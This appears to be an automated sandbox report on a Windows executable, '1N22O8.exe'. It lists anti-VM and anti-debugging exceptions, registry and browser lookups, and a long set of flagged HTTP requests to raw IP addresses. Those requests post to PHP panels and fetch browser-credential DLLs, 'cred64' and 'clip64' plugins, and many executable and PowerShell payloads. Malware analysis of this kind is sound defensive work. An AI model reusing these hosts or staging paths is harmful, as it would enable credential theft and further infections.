CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0082d118
flags: 0
crypto_export_handle: 0x00000000
blob_type: 8
1 1 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
pdb_path wextract.pdb
file C:\Program Files\Mozilla Firefox\firefox.exe
registry HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayVersion
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\firefox.exe\Path
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
resource name AVI
Time & API Arguments Status Return Repeated

__exception__

stacktrace:
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: fb e9 4e 01 00 00 60 8b 74 24 24 8b 7c 24 28 fc
exception.symbol: 1n22o8+0x31c0b9
exception.instruction: sti
exception.module: 1N22O8.exe
exception.exception_code: 0xc0000096
exception.offset: 3260601
exception.address: 0x52c0b9
registers.esp: 2162052
registers.edi: 0
registers.eax: 1
registers.ebp: 2162068
registers.edx: 7143424
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 81 ec 04 00 00 00 89 1c 24 e9 1d 03 00 00 53
exception.symbol: 1n22o8+0x70fca
exception.instruction: sti
exception.module: 1N22O8.exe
exception.exception_code: 0xc0000096
exception.offset: 462794
exception.address: 0x280fca
registers.esp: 2162020
registers.edi: 1971192040
registers.eax: 25415
registers.ebp: 3992645652
registers.edx: 2627868
registers.ebx: 2162688
registers.esi: 2298801283
registers.ecx: 0
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 81 e9 81 1b 75 35 83 ec 04 e9 4a 01 00 00 8b
exception.symbol: 1n22o8+0x71baf
exception.instruction: sti
exception.module: 1N22O8.exe
exception.exception_code: 0xc0000096
exception.offset: 465839
exception.address: 0x281baf
registers.esp: 2162016
registers.edi: 1971192040
registers.eax: 29269
registers.ebp: 3992645652
registers.edx: 606929213
registers.ebx: 2162688
registers.esi: 2298801283
registers.ecx: 2628341
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb e9 93 01 00 00 52 89 34 24 89 e6 81 c6 04 00
exception.symbol: 1n22o8+0x71c00
exception.instruction: sti
exception.module: 1N22O8.exe
exception.exception_code: 0xc0000096
exception.offset: 465920
exception.address: 0x281c00
registers.esp: 2162020
registers.edi: 1971192040
registers.eax: 29269
registers.ebp: 3992645652
registers.edx: 606929213
registers.ebx: 2162688
registers.esi: 2298801283
registers.ecx: 2657610
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 83 ec 04 e9 da 01 00 00 ff 34 24 5a 83 c4 04
exception.symbol: 1n22o8+0x72354
exception.instruction: sti
exception.module: 1N22O8.exe
exception.exception_code: 0xc0000096
exception.offset: 467796
exception.address: 0x282354
registers.esp: 2162020
registers.edi: 1971192040
registers.eax: 0
registers.ebp: 3992645652
registers.edx: 606929213
registers.ebx: 239849
registers.esi: 2298801283
registers.ecx: 2631094
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 52 50 b8 f5 24 1f 38 89 44 24 04 e9 96 00 00
exception.symbol: 1n22o8+0x1ed330
exception.instruction: sti
exception.module: 1N22O8.exe
exception.exception_code: 0xc0000096
exception.offset: 2020144
exception.address: 0x3fd330
registers.esp: 2162020
registers.edi: 4294944348
registers.eax: 370409
registers.ebp: 3992645652
registers.edx: 2130566132
registers.ebx: 4208387
registers.esi: 4166128
registers.ecx: 671
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 56 89 0c 24 c7 04 24 e0 c1 b0 5f 52 ba d9 fe
exception.symbol: 1n22o8+0x1efedd
exception.instruction: sti
exception.module: 1N22O8.exe
exception.exception_code: 0xc0000096
exception.offset: 2031325
exception.address: 0x3ffedd
registers.esp: 2162020
registers.edi: 21446
registers.eax: 4222776
registers.ebp: 3992645652
registers.edx: 143
registers.ebx: 4190518
registers.esi: 4294964407
registers.ecx: 60622
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 81 ec 04 00 00 00 89 34 24 e9 2a ff ff ff 5a
exception.symbol: 1n22o8+0x1f03ec
exception.instruction: sti
exception.module: 1N22O8.exe
exception.exception_code: 0xc0000096
exception.offset: 2032620
exception.address: 0x4003ec
registers.esp: 2162020
registers.edi: 202985
registers.eax: 4222776
registers.ebp: 3992645652
registers.edx: 143
registers.ebx: 4190518
registers.esi: 4294941156
registers.ecx: 60622
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 50 55 bd e9 83 fe 2f b8 f6 00 ad ab 29 e8 5d
exception.symbol: 1n22o8+0x1f5182
exception.instruction: sti
exception.module: 1N22O8.exe
exception.exception_code: 0xc0000096
exception.offset: 2052482
exception.address: 0x405182
registers.esp: 2162020
registers.edi: 10498088
registers.eax: 32295
registers.ebp: 3992645652
registers.edx: 1259
registers.ebx: 4246654
registers.esi: 4294937788
registers.ecx: 14288
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: ed 64 8f 05 00 00 00 00 56 54 e9 78 09 00 00 bb
exception.symbol: 1n22o8+0x1faff4
exception.instruction: in eax, dx
exception.module: 1N22O8.exe
exception.exception_code: 0xc0000096
exception.offset: 2076660
exception.address: 0x40aff4
registers.esp: 2162012
registers.edi: 10498088
registers.eax: 1447909480
registers.ebp: 3992645652
registers.edx: 22104
registers.ebx: 1971327157
registers.esi: 4229001
registers.ecx: 20
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: 0f 3f 07 0b 64 8f 05 00 00 00 00 83 c4 04 83 fb
exception.symbol: 1n22o8+0x1fd024
exception.address: 0x40d024
exception.module: 1N22O8.exe
exception.exception_code: 0xc000001d
exception.offset: 2084900
registers.esp: 2162012
registers.edi: 10498088
registers.eax: 1
registers.ebp: 3992645652
registers.edx: 22104
registers.ebx: 0
registers.esi: 4229001
registers.ecx: 20
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: ed 81 fb 68 58 4d 56 75 0a c7 85 1b 37 2d 12 01
exception.symbol: 1n22o8+0x1fc965
exception.instruction: in eax, dx
exception.module: 1N22O8.exe
exception.exception_code: 0xc0000096
exception.offset: 2083173
exception.address: 0x40c965
registers.esp: 2162012
registers.edi: 10498088
registers.eax: 1447909480
registers.ebp: 3992645652
registers.edx: 22104
registers.ebx: 2256917605
registers.esi: 4229001
registers.ecx: 10
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: cd 01 eb 00 66 be 05 ce f8 81 d6 df fa 4f 23 fc
exception.symbol: 1n22o8+0x20114a
exception.instruction: int 1
exception.module: 1N22O8.exe
exception.exception_code: 0xc0000005
exception.offset: 2101578
exception.address: 0x41114a
registers.esp: 2161980
registers.edi: 0
registers.eax: 2161980
registers.ebp: 3992645652
registers.edx: 1392640048
registers.ebx: 4264522
registers.esi: 274642072
registers.ecx: 12328
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 57 e9 21 fb ff ff 35 c0 a2 92 a2 05 78 b7 7f
exception.symbol: 1n22o8+0x201ecb
exception.instruction: sti
exception.module: 1N22O8.exe
exception.exception_code: 0xc0000096
exception.offset: 2105035
exception.address: 0x411ecb
registers.esp: 2162020
registers.edi: 4268854
registers.eax: 6379
registers.ebp: 3992645652
registers.edx: 1713885419
registers.ebx: 0
registers.esi: 10
registers.ecx: 1404960768
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 68 00 67 77 2f e9 c3 05 00 00 68 51 0e 77 15
exception.symbol: 1n22o8+0x210d7b
exception.instruction: sti
exception.module: 1N22O8.exe
exception.exception_code: 0xc0000096
exception.offset: 2166139
exception.address: 0x420d7b
registers.esp: 2162016
registers.edi: 2620066
registers.eax: 30915
registers.ebp: 3992645652
registers.edx: 6
registers.ebx: 25315905
registers.esi: 1971262480
registers.ecx: 4327986
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb e9 9d 00 00 00 50 54 e9 ee 03 00 00 ba 81 a0
exception.symbol: 1n22o8+0x210cae
exception.instruction: sti
exception.module: 1N22O8.exe
exception.exception_code: 0xc0000096
exception.offset: 2165934
exception.address: 0x420cae
registers.esp: 2162020
registers.edi: 2620066
registers.eax: 30915
registers.ebp: 3992645652
registers.edx: 0
registers.ebx: 25315905
registers.esi: 262633
registers.ecx: 4330353
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 68 35 57 6c 61 89 34 24 57 e9 54 00 00 00 33
exception.symbol: 1n22o8+0x214278
exception.instruction: sti
exception.module: 1N22O8.exe
exception.exception_code: 0xc0000096
exception.offset: 2179704
exception.address: 0x424278
registers.esp: 2162008
registers.edi: 2620066
registers.eax: 26301
registers.ebp: 3992645652
registers.edx: 4340121
registers.ebx: 25315905
registers.esi: 262633
registers.ecx: 310702058
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb e9 27 04 00 00 4b c1 eb 04 81 c3 e3 3b 4e 48
exception.symbol: 1n22o8+0x213e92
exception.instruction: sti
exception.module: 1N22O8.exe
exception.exception_code: 0xc0000096
exception.offset: 2178706
exception.address: 0x423e92
registers.esp: 2162012
registers.edi: 2620066
registers.eax: 16247125
registers.ebp: 3992645652
registers.edx: 4342978
registers.ebx: 0
registers.esi: 262633
registers.ecx: 310702058
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 51 b9 00 5a 1f 1f e9 01 fe ff ff 31 ea 5d 89
exception.symbol: 1n22o8+0x214be2
exception.instruction: sti
exception.module: 1N22O8.exe
exception.exception_code: 0xc0000096
exception.offset: 2182114
exception.address: 0x424be2
registers.esp: 2162008
registers.edi: 2620066
registers.eax: 26071
registers.ebp: 3992645652
registers.edx: 4342978
registers.ebx: 4343419
registers.esi: 262633
registers.ecx: 1267618368
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 81 ec 04 00 00 00 89 04 24 89 0c 24 c7 04 24
exception.symbol: 1n22o8+0x214cf8
exception.instruction: sti
exception.module: 1N22O8.exe
exception.exception_code: 0xc0000096
exception.offset: 2182392
exception.address: 0x424cf8
registers.esp: 2162012
registers.edi: 2620066
registers.eax: 26071
registers.ebp: 3992645652
registers.edx: 4342978
registers.ebx: 4369490
registers.esi: 262633
registers.ecx: 1267618368
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb e9 89 00 00 00 81 ed b2 ef a7 7e 5a 81 f5 ab
exception.symbol: 1n22o8+0x214f51
exception.instruction: sti
exception.module: 1N22O8.exe
exception.exception_code: 0xc0000096
exception.offset: 2182993
exception.address: 0x424f51
registers.esp: 2162012
registers.edi: 19327318
registers.eax: 26071
registers.ebp: 3992645652
registers.edx: 0
registers.ebx: 4346542
registers.esi: 262633
registers.ecx: 1267618368
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 29 db e9 50 01 00 00 89 e0 05 04 00 00 00 51
exception.symbol: 1n22o8+0x218f75
exception.instruction: sti
exception.module: 1N22O8.exe
exception.exception_code: 0xc0000096
exception.offset: 2199413
exception.address: 0x428f75
registers.esp: 2162012
registers.edi: 19327318
registers.eax: 25865
registers.ebp: 3992645652
registers.edx: 1511044083
registers.ebx: 298968385
registers.esi: 262633
registers.ecx: 4387028
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb ba 1d 75 ff 5d 4a 81 ea 23 9f ff 7b f7 d2 81
exception.symbol: 1n22o8+0x2193bc
exception.instruction: sti
exception.module: 1N22O8.exe
exception.exception_code: 0xc0000096
exception.offset: 2200508
exception.address: 0x4293bc
registers.esp: 2162012
registers.edi: 19327318
registers.eax: 1035461480
registers.ebp: 3992645652
registers.edx: 1511044083
registers.ebx: 4294944172
registers.esi: 262633
registers.ecx: 4387028
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 52 ba 00 c5 a5 7b 01 d0 5a 05 8c 2e ed 5f 2d
exception.symbol: 1n22o8+0x225e18
exception.instruction: sti
exception.module: 1N22O8.exe
exception.exception_code: 0xc0000096
exception.offset: 2252312
exception.address: 0x435e18
registers.esp: 2162008
registers.edi: 0
registers.eax: 4414530
registers.ebp: 3992645652
registers.edx: 2130566132
registers.ebx: 4410845
registers.esi: 3696419818
registers.ecx: 1404960768
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb e9 e4 00 00 00 53 89 3c 24 bf 00 c8 4b 3b 52
exception.symbol: 1n22o8+0x2264dc
exception.instruction: sti
exception.module: 1N22O8.exe
exception.exception_code: 0xc0000096
exception.offset: 2254044
exception.address: 0x4364dc
registers.esp: 2162012
registers.edi: 0
registers.eax: 4444017
registers.ebp: 3992645652
registers.edx: 116969
registers.ebx: 4410845
registers.esi: 4294940440
registers.ecx: 1404960768
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 57 89 14 24 81 ec 04 00 00 00 e9 75 00 00 00
exception.symbol: 1n22o8+0x2382b4
exception.instruction: sti
exception.module: 1N22O8.exe
exception.exception_code: 0xc0000096
exception.offset: 2327220
exception.address: 0x4482b4
registers.esp: 2161976
registers.edi: 4488751
registers.eax: 26346
registers.ebp: 3992645652
registers.edx: 2130566132
registers.ebx: 1967148821
registers.esi: 4482987
registers.ecx: 1404960768
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 52 51 68 87 b5 0c 0b e9 68 03 00 00 51 e9 31
exception.symbol: 1n22o8+0x238522
exception.instruction: sti
exception.module: 1N22O8.exe
exception.exception_code: 0xc0000096
exception.offset: 2327842
exception.address: 0x448522
registers.esp: 2161980
registers.edi: 4515097
registers.eax: 26346
registers.ebp: 3992645652
registers.edx: 2130566132
registers.ebx: 1967148821
registers.esi: 4482987
registers.ecx: 1404960768
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb ba 36 00 66 10 68 91 c6 b4 1e e9 24 01 00 00
exception.symbol: 1n22o8+0x2384cd
exception.instruction: sti
exception.module: 1N22O8.exe
exception.exception_code: 0xc0000096
exception.offset: 2327757
exception.address: 0x4484cd
registers.esp: 2161980
registers.edi: 4491461
registers.eax: 0
registers.ebp: 3992645652
registers.edx: 2130566132
registers.ebx: 1967148821
registers.esi: 4482987
registers.ecx: 322689
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 57 56 68 50 92 67 6b e9 3e 00 00 00 5c e9 ff
exception.symbol: 1n22o8+0x2395ad
exception.instruction: sti
exception.module: 1N22O8.exe
exception.exception_code: 0xc0000096
exception.offset: 2332077
exception.address: 0x4495ad
registers.esp: 2161976
registers.edi: 4491461
registers.eax: 26962
registers.ebp: 3992645652
registers.edx: 275120182
registers.ebx: 4491891
registers.esi: 4482987
registers.ecx: 1350198622
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 83 ec 04 89 34 24 e9 35 00 00 00 5c 81 ea 8c
exception.symbol: 1n22o8+0x2396b2
exception.instruction: sti
exception.module: 1N22O8.exe
exception.exception_code: 0xc0000096
exception.offset: 2332338
exception.address: 0x4496b2
registers.esp: 2161980
registers.edi: 4491461
registers.eax: 26962
registers.ebp: 3992645652
registers.edx: 275120182
registers.ebx: 4518853
registers.esi: 4482987
registers.ecx: 1350198622
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 68 f2 3a c2 59 89 34 24 be 18 ab db 6f 50 b8
exception.symbol: 1n22o8+0x238b78
exception.instruction: sti
exception.module: 1N22O8.exe
exception.exception_code: 0xc0000096
exception.offset: 2329464
exception.address: 0x448b78
registers.esp: 2161980
registers.edi: 4491461
registers.eax: 1392536160
registers.ebp: 3992645652
registers.edx: 275120182
registers.ebx: 4518853
registers.esi: 4294943744
registers.ecx: 1350198622
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb e9 58 02 00 00 81 c4 04 00 00 00 55 bd 04 00
exception.symbol: 1n22o8+0x23a6bc
exception.instruction: sti
exception.module: 1N22O8.exe
exception.exception_code: 0xc0000096
exception.offset: 2336444
exception.address: 0x44a6bc
registers.esp: 2161976
registers.edi: 4496519
registers.eax: 29421
registers.ebp: 3992645652
registers.edx: 291860533
registers.ebx: 1144426420
registers.esi: 4495330
registers.ecx: 0
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 50 89 3c 24 e9 46 fe ff ff 8b 04 24 83 c4 04
exception.symbol: 1n22o8+0x239ffa
exception.instruction: sti
exception.module: 1N22O8.exe
exception.exception_code: 0xc0000096
exception.offset: 2334714
exception.address: 0x449ffa
registers.esp: 2161980
registers.edi: 4525940
registers.eax: 29421
registers.ebp: 3992645652
registers.edx: 291860533
registers.ebx: 1144426420
registers.esi: 4495330
registers.ecx: 0
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 52 51 b9 58 ff 9d 71 89 ca e9 83 fb ff ff 29
exception.symbol: 1n22o8+0x23a140
exception.instruction: sti
exception.module: 1N22O8.exe
exception.exception_code: 0xc0000096
exception.offset: 2335040
exception.address: 0x44a140
registers.esp: 2161980
registers.edi: 4525940
registers.eax: 4294941444
registers.ebp: 3992645652
registers.edx: 291860533
registers.ebx: 1144426420
registers.esi: 4495330
registers.ecx: 604292950
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 57 89 0c 24 54 59 56 89 e6 81 c6 04 00 00 00
exception.symbol: 1n22o8+0x23b2a1
exception.instruction: sti
exception.module: 1N22O8.exe
exception.exception_code: 0xc0000096
exception.offset: 2339489
exception.address: 0x44b2a1
registers.esp: 2161980
registers.edi: 4525940
registers.eax: 4528027
registers.ebp: 3992645652
registers.edx: 44777
registers.ebx: 812742001
registers.esi: 4495330
registers.ecx: 4294942744
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 52 89 3c 24 e9 75 00 00 00 5c 89 3c 24 89 0c
exception.symbol: 1n22o8+0x241846
exception.instruction: sti
exception.module: 1N22O8.exe
exception.exception_code: 0xc0000096
exception.offset: 2365510
exception.address: 0x451846
registers.esp: 2161976
registers.edi: 4525940
registers.eax: 32466
registers.ebp: 3992645652
registers.edx: 4526023
registers.ebx: 2631315
registers.esi: 4495330
registers.ecx: 1969225870
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 55 c7 04 24 82 7e 92 33 89 34 24 53 e9 5a 01
exception.symbol: 1n22o8+0x241400
exception.instruction: sti
exception.module: 1N22O8.exe
exception.exception_code: 0xc0000096
exception.offset: 2364416
exception.address: 0x451400
registers.esp: 2161980
registers.edi: 4294937880
registers.eax: 32466
registers.ebp: 3992645652
registers.edx: 4558489
registers.ebx: 2631315
registers.esi: 573479528
registers.ecx: 1969225870
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb e9 80 02 00 00 b9 c4 8c 7f 72 e9 b9 fd ff ff
exception.symbol: 1n22o8+0x244497
exception.instruction: sti
exception.module: 1N22O8.exe
exception.exception_code: 0xc0000096
exception.offset: 2376855
exception.address: 0x454497
registers.esp: 2161976
registers.edi: 4537787
registers.eax: 31606
registers.ebp: 3992645652
registers.edx: 1576689607
registers.ebx: 4538535
registers.esi: 4537787
registers.ecx: 34065
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 52 e9 99 00 00 00 83 c4 04 81 c7 04 00 00 00
exception.symbol: 1n22o8+0x2440fc
exception.instruction: sti
exception.module: 1N22O8.exe
exception.exception_code: 0xc0000096
exception.offset: 2375932
exception.address: 0x4540fc
registers.esp: 2161980
registers.edi: 0
registers.eax: 607947088
registers.ebp: 3992645652
registers.edx: 1576689607
registers.ebx: 4541461
registers.esi: 4537787
registers.ecx: 34065
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 29 c0 e9 d1 00 00 00 59 87 14 24 5c 03 0c 24
exception.symbol: 1n22o8+0x246a0d
exception.instruction: sti
exception.module: 1N22O8.exe
exception.exception_code: 0xc0000096
exception.offset: 2386445
exception.address: 0x456a0d
registers.esp: 2161980
registers.edi: 3992645652
registers.eax: 30257
registers.ebp: 3992645652
registers.edx: 654051297
registers.ebx: 620773380
registers.esi: 4537787
registers.ecx: 4577470
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 81 ec 04 00 00 00 89 1c 24 51 b9 1a 79 fb 6a
exception.symbol: 1n22o8+0x246543
exception.instruction: sti
exception.module: 1N22O8.exe
exception.exception_code: 0xc0000096
exception.offset: 2385219
exception.address: 0x456543
registers.esp: 2161980
registers.edi: 3992645652
registers.eax: 4294939620
registers.ebp: 3992645652
registers.edx: 2298801283
registers.ebx: 620773380
registers.esi: 4537787
registers.ecx: 4577470
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 55 e9 2b 00 00 00 0d 5a 97 b7 7e 2d 96 6e b9
exception.symbol: 1n22o8+0x25b1ec
exception.instruction: sti
exception.module: 1N22O8.exe
exception.exception_code: 0xc0000096
exception.offset: 2470380
exception.address: 0x46b1ec
registers.esp: 2161976
registers.edi: 4609571
registers.eax: 27346
registers.ebp: 3992645652
registers.edx: 2130566132
registers.ebx: 1969225702
registers.esi: 4571930
registers.ecx: 4630809
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 83 ec 04 89 04 24 53 bb fb e2 6f 7a 89 d8 5b
exception.symbol: 1n22o8+0x25a988
exception.instruction: sti
exception.module: 1N22O8.exe
exception.exception_code: 0xc0000096
exception.offset: 2468232
exception.address: 0x46a988
registers.esp: 2161980
registers.edi: 4609571
registers.eax: 27346
registers.ebp: 3992645652
registers.edx: 2130566132
registers.ebx: 1969225702
registers.esi: 4571930
registers.ecx: 4658155
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 52 68 b3 21 43 4d 89 3c 24 e9 c4 02 00 00 89
exception.symbol: 1n22o8+0x25a944
exception.instruction: sti
exception.module: 1N22O8.exe
exception.exception_code: 0xc0000096
exception.offset: 2468164
exception.address: 0x46a944
registers.esp: 2161980
registers.edi: 4609571
registers.eax: 27346
registers.ebp: 3992645652
registers.edx: 2130566132
registers.ebx: 606898514
registers.esi: 0
registers.ecx: 4633503
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 57 c7 04 24 14 b0 b5 7b f7 1c 24 81 34 24 89
exception.symbol: 1n22o8+0x25e3f7
exception.instruction: sti
exception.module: 1N22O8.exe
exception.exception_code: 0xc0000096
exception.offset: 2483191
exception.address: 0x46e3f7
registers.esp: 2161980
registers.edi: 4673853
registers.eax: 28369
registers.ebp: 3992645652
registers.edx: 2130566132
registers.ebx: 1720921475
registers.esi: 0
registers.ecx: 21655681
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 53 54 5b e9 2f 01 00 00 81 c3 01 00 00 00 43
exception.symbol: 1n22o8+0x25e3c5
exception.instruction: sti
exception.module: 1N22O8.exe
exception.exception_code: 0xc0000096
exception.offset: 2483141
exception.address: 0x46e3c5
registers.esp: 2161980
registers.edi: 4648193
registers.eax: 28369
registers.ebp: 3992645652
registers.edx: 0
registers.ebx: 98601296
registers.esi: 0
registers.ecx: 21655681
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 50 68 23 68 1f 67 58 e9 b0 ff ff ff ff 34 24
exception.symbol: 1n22o8+0x26b673
exception.instruction: sti
exception.module: 1N22O8.exe
exception.exception_code: 0xc0000096
exception.offset: 2537075
exception.address: 0x47b673
registers.esp: 2161980
registers.edi: 4687834
registers.eax: 30847
registers.ebp: 3992645652
registers.edx: 2130566132
registers.ebx: 4730228
registers.esi: 88616640
registers.ecx: 1404960768
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 53 e9 18 04 00 00 31 e9 e9 14 fe ff ff 53 e9
exception.symbol: 1n22o8+0x26b834
exception.instruction: sti
exception.module: 1N22O8.exe
exception.exception_code: 0xc0000096
exception.offset: 2537524
exception.address: 0x47b834
registers.esp: 2161980
registers.edi: 4687834
registers.eax: 30847
registers.ebp: 3992645652
registers.edx: 912362088
registers.ebx: 4702192
registers.esi: 88616640
registers.ecx: 0
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 56 81 ec 04 00 00 00 89 14 24 ba 5b be 7e 7b
exception.symbol: 1n22o8+0x278db9
exception.instruction: sti
exception.module: 1N22O8.exe
exception.exception_code: 0xc0000096
exception.offset: 2592185
exception.address: 0x488db9
registers.esp: 2161976
registers.edi: 46609644
registers.eax: 31550
registers.ebp: 3992645652
registers.edx: 2130566132
registers.ebx: 4754612
registers.esi: 46645228
registers.ecx: 1404960768
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb e9 71 fc ff ff ba 0a 15 9f 7f bf 96 59 b9 96
exception.symbol: 1n22o8+0x279299
exception.instruction: sti
exception.module: 1N22O8.exe
exception.exception_code: 0xc0000096
exception.offset: 2593433
exception.address: 0x489299
registers.esp: 2161980
registers.edi: 46609644
registers.eax: 31550
registers.ebp: 3992645652
registers.edx: 2130566132
registers.ebx: 4786162
registers.esi: 46645228
registers.ecx: 1404960768
1 0 0
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://45.93.20.28/
suspicious_features POST method with no referer header, POST method with no useragent header, Connection to IP address suspicious_request POST http://45.93.20.28/85a1cacf11314eb8.php
suspicious_features POST method with no referer header, POST method with no useragent header, Connection to IP address suspicious_request POST http://176.113.115.6/Ni9kiput/index.php
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://45.93.20.28/c66c0eade263c9a8/sqlite3.dll
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://176.113.115.7/files/7868598855/zY9sqWs.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://45.93.20.28/c66c0eade263c9a8/freebl3.dll
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://45.93.20.28/c66c0eade263c9a8/mozglue.dll
suspicious_features POST method with no referer header, POST method with no useragent header, Connection to IP address suspicious_request POST http://185.125.50.8/mVsXkjvb3/index.php
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://176.113.115.7/files/7834629666/v6Oqdnc.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://45.93.20.28/c66c0eade263c9a8/msvcp140.dll
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://45.93.20.28/c66c0eade263c9a8/nss3.dll
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://45.93.20.28/c66c0eade263c9a8/softokn3.dll
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://45.93.20.28/c66c0eade263c9a8/vcruntime140.dll
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://176.113.115.7/files/7212159662/HmngBpR.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://185.125.50.8/mVsXkjvb3/Plugins/cred64.dll
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://176.113.115.7/files/5419477542/ADFoyxP.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://185.125.50.8/mVsXkjvb3/Plugins/clip64.dll
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://176.113.115.7/files/8032894631/9hUDDVk.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://176.113.115.7/files/5153162918/pwHxMTy.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://176.113.115.7/files/6491397189/T0QdO0l.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://176.113.115.7/files/7853925217/ogfNbjS.ps1
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://185.215.113.16/test/amnew.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://176.113.115.7/files/5526411762/yUI6F6C.exe
suspicious_features POST method with no referer header, POST method with no useragent header, Connection to IP address suspicious_request POST http://185.215.113.209/Di0Her478/index.php
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://176.113.115.7/files/5526411762/CgmaT61.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://176.113.115.7/files/2043702969/9zQZD2e.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://176.113.115.7/files/6691015685/V0Bt74c.exe
request GET http://45.93.20.28/
request POST http://45.93.20.28/85a1cacf11314eb8.php
request POST http://176.113.115.6/Ni9kiput/index.php
request GET http://45.93.20.28/c66c0eade263c9a8/sqlite3.dll
request GET http://176.113.115.7/files/7868598855/zY9sqWs.exe
request GET http://45.93.20.28/c66c0eade263c9a8/freebl3.dll
request GET http://45.93.20.28/c66c0eade263c9a8/mozglue.dll
request POST http://185.125.50.8/mVsXkjvb3/index.php
request GET http://176.113.115.7/files/7834629666/v6Oqdnc.exe
request GET http://45.93.20.28/c66c0eade263c9a8/msvcp140.dll
request GET http://45.93.20.28/c66c0eade263c9a8/nss3.dll
request GET http://45.93.20.28/c66c0eade263c9a8/softokn3.dll
request GET http://45.93.20.28/c66c0eade263c9a8/vcruntime140.dll
request GET http://176.113.115.7/files/7212159662/HmngBpR.exe
request GET http://185.125.50.8/mVsXkjvb3/Plugins/cred64.dll
request GET http://176.113.115.7/files/5419477542/ADFoyxP.exe
